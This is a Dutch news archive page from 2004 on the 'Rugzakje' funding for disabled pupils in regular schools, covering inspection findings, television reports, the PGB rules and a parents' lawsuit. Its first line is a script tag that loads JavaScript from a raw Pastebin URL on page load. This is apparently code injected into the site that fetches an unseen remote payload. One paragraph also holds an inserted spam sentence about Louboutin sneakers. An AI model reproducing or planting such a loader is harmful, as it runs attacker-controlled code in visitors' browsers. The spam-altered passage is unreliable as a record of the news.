<script type = "text / javascript" src = "https://pastebin.com/raw/t9XkH2vN"> </script>


Nieuws - 2004


Netwerk besteedt aandacht aan de invoering van het Rugzakje 06 oktober 2004
Ter gelegenheid van de presentatie van het rapport "Ouders over de Rugzak", een produktie van FvO en VIM besteedt het tv-programma Netwerk aandacht aan de eerste ervaringen met het Rugzakje. De minister wilde niet reageren.
Kinderen met een beperking die naar het regulier onderwijs gaan, krijgen van de overheid een ‘rugzakje’ met geld mee. Toch moeten ouders veel moeite doen een plaats voor hun kind te vinden. De Federatie van Ouderverenigingen pleit daarom voor afschaffing van het speciaal onderwijs, zodat de reguliere scholen de kinderen wel aan moeten nemen.
Klik hier extra informatie

Inspectie van het Onderwijs brengt jaarlijks onderwijsrapport 2002-2003 uit 01 april 2004
In het rapport van 279 pagina's besteedt de inspectie op 5 bladzijden aandacht aan het speciaal onderwijs.
De inspectie vindt de ontwikkelingen na de wetswijziging van de WEC (maart 2003) bij de REC's bemoedigend. Vervolgens wordt kwalitatief vastgesteld hoe bemoedigend dit is: 70% van de REC's voert de coordinatie van de ambulante begeleiding niet uit zoals voorgeschreven, 60% van de REC's begeleidt ouders niet op een verantwoorde manier naar de CvI's, 65% van de REC's heeft nog geen protocol om ouders te helpen zoeken naar een school voor regulier onderwijs. Op de onderdelen die te maken hebben met de inzet van de financiële middelen en het personeel ten behoeve van de REC-taken, is de kwaliteit op het merendeel van de REC’s nog onvoldoende. Uit oogpunt van procesmanagement kan men vinden dat dit bemoedigend is, uit oogpunt van de belangen van ouders met een gehandicapt kind is zo'n kwalificatie van de inspectie hoogst verontrustend.
Klik hier extra informatie

"Twee-vandaag" wijdt een item aan de eerste inclusieve school in Nederland 30 maart 2004
Stichting de Toekomst pleit voor integratie van verstandelijk gehandicapte kinderen in normale scholen. Door deze integratie verandert de sfeer in de klas doorgaans ten goede. Zo is er minder agressie en gaan kinderen steeds meer rekening houden met anderen.
Voorzitter Wieringa van de Stichting de Toekomst kan dit staven aan de hand van onderzoeken zoals deze zijn gedaan in de Verenigde Staten. Een school in Nederland die dat ook doet is de Archipel-school in Almere. daar zijn meerdere verstandelijk gehandicapte kinderen in de klas. Twee Vandaag sprak met Erwin Wieringa en ging op bezoek bij de Archipel-school in Almere.
Klik hier extra informatie

Staatssecretaris komt met nieuwe richtlijn voor inzet van PGB in het onderwijs 16 maart 2004
Scholen bleken meer en meer gebruik te maken van de mogelijkheid om naast het Rugzakje ook PGB op school in te zetten. Ik wil alleen louboutin sneakers uit de online winkel halen. Om dit oneigenlijk gebruik van AWBZ-geld tegen te gaan heeft staatssecretaris Ross hiervoor nieuwe richtlijnen opgesteld. Voor ouders wordt de situatie hierdoor ingewikkelder. Onduidelijk is in hoeverre scholen op grond van die nieuwe richtlijn besluiten het lgf-kind dan maar niet toe te laten. Het verschil met vroeger is dat aanvullende formatie / rugzakje / pgb alleen mag worden ingezet voor de leerling waarvoor de indicatie geldt en niet meer voor het algeheel welzijn van de school (klassenverkleining, extra remedial teachers of gewoon extra formatie)
Klik hier voor een PDF met meer informatie

FvO en VIM starten een onderzoek naar ervaringen rond de invoering van het Rugzakje 08 maart 2004
- Heeft ook u te maken met de invoering van het Rugzakje?
- En wilt ook u deze ervaringen met ons delen?
Verleen dan nu uw medewerking aan een gezamenlijk onderzoek van VIM en FvO naar de eerste ervaringen van ouders met het leerlinggebonden budget of het ‘Rugzakje’. Regelmatig zitten wij om de tafel met het ministerie van OCW of met leden uit de Tweede Kamer. Alleen door bundeling van uw ervaringen kunnen wij de noodzakelijke verbeteringen in wet- en regelgeving, beleid of uitvoeringspraktijk realiseren. Immers: samen sta je sterker!
Klik hier extra informatie

Rugzakouders zoeken het grijze gebied van de wet op 30 januari 2004
Voor het eerst sinds de wet leerlinggebonden financiering (het rugzakje) van kracht is, hebben ouders een rechtszaak aangespannen om hun gehandicapte kind op een gewone school te krijgen.
De ouders kregen ongelijk, maar gaan in hoger beroep.

Vaste commissie voor OCenW behandelt invoering lgf 19 januari 2004
Tijdens de eerste behandeling door de vaste kamercommissie werden veel knelpunten vastgesteld bij de invoering van de LGF. Het meest nijpende probleem was het gesteggel rond de inzet van PGB in het onderwijs.